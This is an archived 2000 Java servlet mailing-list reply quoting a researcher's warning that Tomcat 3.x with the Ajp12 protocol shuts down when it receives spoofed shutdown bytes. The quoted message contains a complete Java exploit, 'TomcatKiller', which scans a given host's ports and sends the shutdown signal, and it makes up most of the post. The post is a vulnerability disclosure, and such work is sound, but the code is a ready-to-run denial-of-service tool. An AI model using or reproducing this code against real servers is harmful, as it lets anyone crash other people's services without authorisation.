Re: Tomcat Killer

George I Matkovits Fri, 06 Oct 2000 07:15:12 -0700
Could you, please post this also onto the Apache site.
Thank you - George

Stuart Maclean wrote:

> Hi all, just a word of warning about Tomcat 3.1 and from what I can
> tell, 3.2beta4.  Looking at the source code, if you're using Ajp12 for
> the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> batch/shell file does its job by sending "exit please" bytes to
> Tomcat.  It doesn't take much to spoof this, here's my TomcatKiller
> class below.  Just guess a host and port which may have Tomcat
> running, and over it goes...
>
> I patched the sources so hopefully it won't happen to me ;)
>
> import java.net.*;
> import java.io.*;
>
> public class TomcatKiller {
>
>         static public void main( String[] args ) {
>
>                 final byte SIGNAL = (byte)254;
>                 final byte BYEBYE = (byte)15;
>                 byte[] msg = { SIGNAL, BYEBYE };
>
>                 int min = 8007, max = 8007;
>                 String host = args[0];
>
>                 try {
>                         if( args.length > 1 )
>                                 min = max = Integer.parseInt( args[1] );
>                         if( args.length > 2 )
>                                 max = Integer.parseInt( args[2] );
>                         if( min > max ) {
>                                 int tmp = min;
>                                 min = max;
>                                 max = tmp;
>                         }
>                         for( int i = min; i <= max; i++ ) {
>                                 try {
>                                         Socket s = new Socket( host, i );
>                                         OutputStream os = s.getOutputStream();
>                                         os.write( msg );
>                                         os.flush();
>                                         break;
>                                 } catch( ConnectException ce ) {
>                                         System.err.println( "conn refused " + i );
>                                 } catch( IOException ioe ) {
>                                         ioe.printStackTrace();
>                                         break;
>                                 }
>                         }
>                 } catch( Exception e ) {
>                         e.printStackTrace();
>                         System.exit( 1 );
>                 }
>         }
> }
>
> // eof
>
> stu
>
> --
> Stuart Maclean, Research Associate
> University of Washington
> ITS Research Program, College of Engineering
> Box 352500
> Seattle, WA 98195-2500
> Tel: (206) 543-0637
> http://www.its.washington.edu
>
> ___________________________________________________________________________
> To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
> of the message "signoff SERVLET-INTEREST".
>
> Archives: http://archives.java.sun.com/archives/servlet-interest.html
> Resources: http://java.sun.com/products/servlet/external-resources.html
> LISTSERV Help: http://www.lsoft.com/manuals/user/user.html

___________________________________________________________________________
To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
of the message "signoff SERVLET-INTEREST".

Archives: http://archives.java.sun.com/archives/servlet-interest.html
Resources: http://java.sun.com/products/servlet/external-resources.html
LISTSERV Help: http://www.lsoft.com/manuals/user/user.html
Re: Tomcat Killer

Reply via email to
